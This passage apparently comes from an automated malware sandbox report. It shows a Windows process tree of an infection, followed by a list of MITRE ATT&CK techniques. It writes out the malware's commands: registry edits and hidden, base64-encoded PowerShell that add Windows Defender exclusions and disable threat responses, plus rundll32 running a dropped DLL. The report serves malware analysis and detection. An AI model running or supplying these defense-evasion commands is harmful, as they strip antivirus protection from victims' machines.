    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:9036
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:7212
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ENXTzHitnHcZC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ENXTzHitnHcZC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpBrNwvlU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HpBrNwvlU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QsvZUvXLjTYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QsvZUvXLjTYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XGtOAeLydgLMFVPooyR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XGtOAeLydgLMFVPooyR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YaVGjnCOvghaC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YaVGjnCOvghaC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhkfrwUhU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhkfrwUhU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWbkTMRRswUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWbkTMRRswUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wyDIDuFJfRUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wyDIDuFJfRUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ywXkFCfGcVFU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ywXkFCfGcVFU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ORAmyWbZLxzkFGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\ORAmyWbZLxzkFGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QRMFokDIujmzevVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\QRMFokDIujmzevVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\wuculgiINbiaRqBeX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MHyYHIUgqYAGBQdH\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\MHyYHIUgqYAGBQdH\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OooJbXkEBeoeLJsK\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\OooJbXkEBeoeLJsK\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:8800
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6852
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:8344
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AvTmyoLTdtvhjnHMgcR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:668
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ENXTzHitnHcZC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ENXTzHitnHcZC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10028
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpBrNwvlU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HpBrNwvlU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsvZUvXLjTYU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9992
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QsvZUvXLjTYU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XGtOAeLydgLMFVPooyR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XGtOAeLydgLMFVPooyR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:7560
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YaVGjnCOvghaC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9448
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YaVGjnCOvghaC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhkfrwUhU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3776
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhkfrwUhU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWbkTMRRswUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWbkTMRRswUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9320
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wyDIDuFJfRUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:6804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wyDIDuFJfRUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9316
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ywXkFCfGcVFU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ywXkFCfGcVFU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8276
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\ORAmyWbZLxzkFGVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10708

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4144

C:\Users\Admin\AppData\Roaming\rtsswjr
C:\Users\Admin\AppData\Roaming\rtsswjr
1⤵
PID:5540

C:\Users\Admin\AppData\Roaming\tbsswjr
C:\Users\Admin\AppData\Roaming\tbsswjr
1⤵
PID:5344

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:6612

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\OooJbXkEBeoeLJsK\eiRUyuPj\EpNJRgJ.dll",#1 /jAsite_idfRe 525403
1⤵
PID:2852
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\OooJbXkEBeoeLJsK\eiRUyuPj\EpNJRgJ.dll",#1 /jAsite_idfRe 525403
  2⤵
  PID:4984
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "LhQlXqIfnavoTxUYk"
    3⤵
    PID:6188

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:6252

C:\Users\Admin\AppData\Local\Temp\ajblf.exe
C:\Users\Admin\AppData\Local\Temp\ajblf.exe
1⤵
PID:1556

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:8740

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9148

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
1⤵
PID:5832

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6080

C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
C:\Users\Admin\AppData\Roaming\CustomAttributeType\AreAccessRulesProtected.exe
1⤵
PID:756

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:9620

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
PID:9692

C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\1powerreducepro.exe
C:\Users\Admin\AppData\Local\Temp\IXP023.TMP\1powerreducepro.exe
1⤵
PID:8668
- C:\Users\Admin\AppData\Local\Temp\IXP024.TMP\powerreduce.exe
  C:\Users\Admin\AppData\Local\Temp\IXP024.TMP\powerreduce.exe
  2⤵
  PID:3148

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\BctMiEHyZykyFyQ\DPKYGBK.exe
C:\Users\Admin\AppData\Local\Temp\oWAkWYKplpJQgoDVT\BctMiEHyZykyFyQ\DPKYGBK.exe kt /zFsite_idfSO 385118 /S
1⤵
PID:9296

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8412

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7800

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:3408

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:8200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9264

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:8836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9360

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:10640

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1⤵
PID:10336

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Scripting

T1064

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

Remote System Discovery

T1018

System Information Discovery